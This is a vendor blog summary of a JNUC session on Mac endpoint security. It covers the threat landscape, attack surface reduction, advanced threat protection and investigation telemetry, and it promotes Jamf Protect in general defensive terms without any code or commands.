Practical Mac security
Get actionable insights to secure your Mac fleet and defend them from current and growing threats.

The Mac threat landscape
In this JNUC session, Jamf Product Owners Kari Lundberg and Matt Taylor give us practical tips for our Mac security journey, especially when using Jamf Protect. To begin, they describe the current threat landscape affecting Macs.
With the increase in remote work comes an increase in the attack surface that puts data security at risk. Contrary to old beliefs that Macs don’t get viruses, Macs are increasingly targeted as their presence at work grows.
Mac malware has evolved too, with attackers deploying more aggressive and dangerous tactics like cryptojacking, infostealer and commodity malware. Users also are exposed to malicious advertising in a browser, to dangerous torrented apps and spearphishing campaigns.
Endpoint hardening
Defending against these threats requires — among other strategies — hardening your endpoints. As told in their presentation, endpoint hardening involves “applying a series of best practices, configurations and security measures” to reduce vulnerabilities on the device. Or as Taylor summarizes, to make your device more expensive to breach than the devices around it.
Taylor and Lundberg focus on three key strategies that the audience can implement with minimal overhead.
Attack surface reduction
Their first strategy is to reduce your attack surface by mitigating vulnerabilities. They recommend the following layers of defense:
- Platform app security: Security tools and features are built right into macOS; these provide a strong foundation against many common malware strains.
- Block risky websites: Using content filtering tools and enforcing acceptable use policies prevent users from accessing malicious websites. Security software like Jamf Protect blocks malicious traffic at the network level — preventing attacks across all apps.
- Patch software: Updating your software to the latest version ensures they have the most up to date security patches. Prioritizing highly targeted and/or high-risk software will lower the chance of a successful attack.
- Control hardware devices: Curiosity can lead users to do things like plug in a stray USB drive into their device to find its owner. Attackers know this and will plant them as a means of exploitation. Restricting external device access can protect against these threats, and limiting them to read-only can stop inbound process execution.
Advanced threat protection
Bad actors are using increasingly sophisticated attack methods that can evade detection. As Lundberg and Taylor discuss in their presentation, that’s why it’s critical to:
Block web-based threats
90% of successful attacks start with phishing. Blocking access to phishing websites/attempts can stop attackers from reaching the device in the first place. And this content filtering can disrupt contact with a command and control server and prevent data exfiltration.
Block malicious software
If/when malware ends up on a device, its execution must be prevented. Jamf Protect runs on industry-leading threat intelligence to stop malware from launching on your system. This malware may be potentially unwanted apps, commodity malware, advanced persistent threats or more. Your detection software must be able to detect these threats, whether they are known and listed in a database, or novel.
Block malicious behavior
Living-off-the-land attacks rely on built-in macOS software for their success. Since these use legitimate tools and don’t install malicious files that can be detected, they have to be identified by their behavior. Jamf Protect can recognize suspicious behavior and automatically block and report the device.
Accelerating investigations
To prevent an attack from happening again, you have to understand its full nature and scope. IT and security teams need access to telemetry data to gain this insight, like:
- Apps and processes
- Persistence
- Command line activity
- System logs
- And more
Jamf Protect provides this data and pairs it with SIEM integrations like Splunk, Microsoft Sentinel and others — so admins can get the information they need to keep their fleet protected.
Key takeaways
Taylor and Lundberg leave us with these key takeaways:
- Built-in security is a strong foundation, but it’s just the starting point.
- As threat actors focus more on Mac, so should you and your security tools.
- Patch your software